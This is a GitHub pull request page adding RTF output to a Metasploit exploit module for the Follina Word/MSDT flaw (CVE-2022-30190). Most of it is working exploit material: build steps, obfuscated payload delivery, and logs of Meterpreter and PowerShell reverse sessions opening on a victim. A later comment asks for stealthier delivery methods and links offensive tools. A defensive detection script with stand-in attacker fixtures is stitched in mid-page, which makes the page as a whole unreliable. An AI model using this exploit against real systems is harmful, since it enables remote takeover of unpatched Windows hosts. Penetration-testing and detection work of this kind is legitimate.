
Add rtf support to cve-2022-30190 AKA Follina #16734

Merged (3 commits), Aug 25, 2022

Conversation

bwatters-r7 (Contributor) commented Jun 30, 2022

This PR adds RTF support to the msdtjs exploit for CVE-2022-30190, AKA Follina.

Verification

List the steps needed to make sure this thing works

  • Start msfconsole
  • use windows/fileformat/word_msdtjs_rce
  • set lhost <lhost>
  • set lport <lport>
  • set FILENAME <something.rtf>
  • set OUTPUT_FORMAT rtf
  • run
  • upload the resulting rtf document to a windows target with an unpatched version of Word
  • turn on preview in the file explorer window
  • click on the rtf
  • get a session

Example

msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options

Module options (exploit/windows/fileformat/word_msdtjs_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        msf.docx         no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   OUTPUT_FORMAT   rtf              yes       Obfuscate JavaScript content. (Accepted: docx, rtf)
   SRVHOST         10.5.135.101     yes       The local host or network interface to listen on. This must be an address on the loca
                                              l machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.5.135.101     yes       The listen address (an interface may be specified)
   LPORT     4567             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word

msf6 exploit(windows/fileformat/word_msdtjs_rce) > set OUTPUT_FORMAT rtf
OUTPUT_FORMAT => rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > set FILENAME rtf.rtf
FILENAME => rtf.rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
[*] Exploit running as background job 26.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.5.135.101:4567 
[*] Using URL: http://10.5.135.101:8080/IfjWYa3kZvK1vdJ
[*] Server started.
[*] Generating a malicious rtf file
msf6 exploit(windows/fileformat/word_msdtjs_rce) > [*] http://10.5.135.101:8080/IfjWYa3kZvK1vdJ.html
[+] rtf.rtf stored at /home/tmoose/.msf4/local/rtf.rtf
[*] Powershell command length: 3677
[*] 10.5.132.101     word_msdtjs_rce - Sending HTML Payload
[*] 10.5.132.101     word_msdtjs_rce - Obfuscate JavaScript content
[*] 10.5.132.101     word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200774 bytes) to 10.5.132.101
[*] Meterpreter session 1 opened (10.5.135.101:4567 -> 10.5.132.101:49762) at 2022-06-30 17:04:57 -0500

@bwatters-r7 bwatters-r7 added the rn-enhancement release notes enhancement label Jun 30, 2022
@bwatters-r7 bwatters-r7 marked this pull request as ready for review August 17, 2022 18:53
@smcintyre-r7 smcintyre-r7 self-assigned this Aug 25, 2022
smcintyre-r7 (Contributor) commented:
Working on Windows 10 with the windows/x64/meterpreter/reverse_tcp and windows/x64/powershell_reverse_tcp payloads.

Testing Output
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
[*] Exploit running as background job 4.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.159.128:4444 
msf6 exploit(windows/fileformat/word_msdtjs_rce) > [*] Using URL: http://192.168.159.128:8080/ogr4c1cWefOyFN
[*] Server started.
[*] Generating a malicious docx file
[*] Injecting payload in docx document
[*] Finalizing docx 'msf_psh.rtf'
[+] msf_psh.rtf stored at /home/smcintyre/.msf4/local/msf_psh.rtf
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending PowerShell Payload
[*] Powershell session session 2 opened (192.168.159.128:4444 -> 192.168.159.109:60570) at 2022-08-25 15:06:50 -0400
msf6 exploit(windows/fileformat/word_msdtjs_rce) > sessions -i 2
[*] Starting interaction with 2...

PS C:\Users\msfuser\AppData\Local\Temp\SDIAG_2c47fc77-f271-451a-aaea-26b6a76f31ca> 

smcintyre-r7 (Contributor) commented:

Alright I'm going to get this landed. Just double checked that the RTF and DOCX files are both working. Also the RTF file is working from the explorer preview, in which case it doesn't even need the user to enable editing.

Testing Output
msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] Using URL: http://192.168.159.128:8080/rLuZc7WwkUDHqHz
[*] Server started.
[*] Generating a malicious docx file
[*] Injecting payload in docx document
[*] Finalizing docx 'docx_64met.docx'
[+] docx_64met.docx stored at /home/smcintyre/.msf4/local/docx_64met.docx

msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options 

Module options (exploit/windows/fileformat/word_msdtjs_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        docx_64met.docx  no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   OUTPUT_FORMAT   docx             yes       File format to use [docx, rtf]. (Accepted: docx, rtf)
   SRVHOST         192.168.159.128  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/word_msdtjs_rce) > set FILENAME rtf_64met.rtf
FILENAME => rtf_64met.rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > set OUTPUT_FORMAT rtf
OUTPUT_FORMAT => rtf
msf6 exploit(windows/fileformat/word_msdtjs_rce) > set LPORT 5555
LPORT => 5555
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
msf6 exploit(windows/fileformat/word_msdtjs_rce) > run
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
[*] Started reverse TCP handler on 192.168.159.128:5555 
[*] Using URL: http://192.168.159.128:8080/BBa7vVJcAYhC7A
[*] Server started.
[*] Generating a malicious rtf file
[+] rtf_64met.rtf stored at /home/smcintyre/.msf4/local/rtf_64met.rtf

msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
msf6 exploit(windows/fileformat/word_msdtjs_rce) > show options 

Module options (exploit/windows/fileformat/word_msdtjs_rce):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   CUSTOMTEMPLATE                   no        A DOCX file that will be used as a template to build the exploit.
   FILENAME        rtf_64met.rtf    no        The file name.
   OBFUSCATE       true             yes       Obfuscate JavaScript content.
   OUTPUT_FORMAT   rtf              yes       File format to use [docx, rtf]. (Accepted: docx, rtf)
   SRVHOST         192.168.159.128  yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT         8080             yes       The local port to listen on.
   SSL             false            no        Negotiate SSL for incoming connections
   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                          no        The URI to use for this exploit (default is random)


Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     192.168.159.128  yes       The listen address (an interface may be specified)
   LPORT     5555             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word


msf6 exploit(windows/fileformat/word_msdtjs_rce) > jobs 

Jobs
====

  Id  Name                                         Payload                              Payload opts
  --  ----                                         -------                              ------------
  0   Exploit: windows/fileformat/word_msdtjs_rce  windows/x64/meterpreter/reverse_tcp  tcp://192.168.159.128:4444
  1   Exploit: windows/fileformat/word_msdtjs_rce  windows/x64/meterpreter/reverse_tcp  tcp://192.168.159.128:5555

msf6 exploit(windows/fileformat/word_msdtjs_rce) > 
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200774 bytes) to 192.168.159.109
[*] Meterpreter session 1 opened (192.168.159.128:5555 -> 192.168.159.109:61330) at 2022-08-25 17:23:52 -0400
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending HTML Payload
[*] 192.168.159.109  word_msdtjs_rce - Obfuscate JavaScript content
[*] 192.168.159.109  word_msdtjs_rce - Sending PowerShell Payload
[*] Sending stage (200774 bytes) to 192.168.159.109
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.109:58455) at 2022-08-25 17:24:24 -0400

msf6 exploit(windows/fileformat/word_msdtjs_rce) >

@smcintyre-r7 smcintyre-r7 added module enhancement rn-modules release notes for new or majorly enhanced modules and removed rn-enhancement release notes enhancement labels Aug 25, 2022
smcintyre-r7 added a commit that referenced this pull request Aug 25, 2022
@smcintyre-r7 smcintyre-r7 merged commit 6831322 into rapid7:master Aug 25, 2022
smcintyre-r7 (Contributor) commented:

Release Notes

This updates the exploit for CVE-2022-30190 (AKA Follina) to support generating RTF exploit documents. RTF documents are helpful for not only being another exploit vector, but they will trigger the payload execution when viewed by Explorer's preview tab without needing user interaction to enable editing functionality.
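The release note above is the part a defender should take away: an RTF that fires from the Explorer preview pane removes the "enable editing" click that normally gates document-borne payloads, so the file has to be caught before it is rendered. As an added example (not code from this pull request or from the Metasploit project), the Python below scans DOCX and RTF files for the structural indicators of the CVE-2022-30190 delivery pattern: an OLE object relationship whose target is an external URL, or an auto-updating linked object or literal ms-msdt: URI inside an RTF stream. The sample documents are constructed inline, the host attacker.invalid is a placeholder, and the RTF control-word heuristic (\objautlink / \objupdate) is an assumption about how linked objects are expressed, not something the page states.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# OOXML relationship type for OLE objects and the package-relationships namespace.
OLE_REL_TYPE = "http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
PKG_REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"

URL_RE = re.compile(rb"https?://[^\s\"'<>{}\\]+", re.IGNORECASE)
MSDT_RE = re.compile(rb"ms-msdt:", re.IGNORECASE)


def scan_docx(data: bytes) -> list[str]:
    """Flag .rels parts that bind an OLE object to an external URL.
    A normal embedded object has no TargetMode (internal part), so it is not flagged."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{PKG_REL_NS}}}Relationship"):
                target = rel.get("Target", "")
                if rel.get("Type") == OLE_REL_TYPE and rel.get("TargetMode") == "External":
                    findings.append(f"{name}: external oleObject -> {target}")
                if MSDT_RE.search(target.encode()):
                    findings.append(f"{name}: ms-msdt: URI -> {target}")
    return findings


def scan_rtf(data: bytes) -> list[str]:
    """RTF has no relationship parts; the equivalent signal (assumed heuristic) is an
    auto-updating linked object that references a remote URL, or an ms-msdt: URI."""
    findings = []
    if not data.startswith(b"{\\rtf"):
        return findings
    linked = b"\\objautlink" in data or b"\\objupdate" in data
    urls = URL_RE.findall(data)
    if linked and urls:
        findings.append("rtf: auto-updating linked object with remote target -> "
                        + urls[0].decode(errors="replace"))
    if MSDT_RE.search(data):
        findings.append("rtf: ms-msdt: URI present")
    return findings


def scan(data: bytes) -> list[str]:
    """Dispatch on the file's magic bytes: PK (zip container, DOCX) or {\\rtf."""
    if data.startswith(b"PK"):
        return scan_docx(data)
    return scan_rtf(data)


# --- constructed samples; these are test fixtures, not real exploit documents ---

def build_docx(rels_xml: str) -> bytes:
    """Minimal constructed DOCX containing only the parts the scanner inspects."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("word/document.xml", "<w:document/>")
        zf.writestr("word/_rels/document.xml.rels", rels_xml)
    return buf.getvalue()


BENIGN_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="embeddings/oleObject1.bin"/>
</Relationships>'''

SUSPECT_RELS = f'''<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="{PKG_REL_NS}">
  <Relationship Id="rId1" Type="{OLE_REL_TYPE}" Target="http://attacker.invalid/x.html" TargetMode="External"/>
</Relationships>'''

BENIGN_RTF = b"{\\rtf1\\ansi Quarterly report.\\par}"
SUSPECT_RTF = (b"{\\rtf1\\ansi{\\object\\objautlink\\objupdate{\\*\\objdata 0102}"
               b" http://attacker.invalid/x.html}\\par}")

if __name__ == "__main__":
    samples = [("benign.docx", build_docx(BENIGN_RELS)), ("suspect.docx", build_docx(SUSPECT_RELS)),
               ("benign.rtf", BENIGN_RTF), ("suspect.rtf", SUSPECT_RTF)]
    for label, blob in samples:
        hits = scan(blob)
        print(f"{label}: {'FLAGGED ' + '; '.join(hits) if hits else 'clean'}")
```

Run it over a mail-gateway quarantine or a share of recently written .docx/.rtf files; anything flagged deserves a look at the referenced URL before the file reaches a host where Explorer's preview pane is enabled.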

hastalamuerte commented May 1, 2023

Hello, @smcintyre-r7 thanks for your work, guys!
^_^

Is it possible to improve a Follina payload and maybe msf

  1. using not only the msdt handler/service. Maybe ms-search, mshta and Edge ones.
     Some info
     https://lolbas-project.github.io/#
     nandisec/mshta@909383b
     https://github.com/AdiMarianMutu/MSHTA-VBS-download-and-execute
     https://github.com/redcanaryco/AtomicTestHarnesses
     https://www.splunk.com/en_us/blog/security/follina-for-protocol-handlers.html
     https://blog.syss.com/posts/abusing-ms-office-protos/

  2. Use DNS records as a payload
     https://github.com/rtfmkiesel/goldig
     Works nice! Can be transformed into msf

  3. and by signing host and doc file
     https://github.com/certbot/certbot

  4. And is it possible to not host an HTML payload, but contain the HTML scheme inside the doc file to hook msdt?

  5. https://twitter.com/Max_Mal_/status/1633102894328168448
     https://youtu.be/GiT8Mu_Hws0
     New type of macros in doc payload. It seems to use Edge URL handlers (?).
     https://github.com/S3cur3Th1sSh1t/OffensiveVBA
     https://github.com/sevagas/macro_pack

hastalamuerte commented:

@bwatters-r7
And please look at it
https://github.com/34zY/Microsoft-Office-Word-MSHTML-Remote-Code-Execution-Exploit

It's a new doc-type CVE. Ready for Metasploit
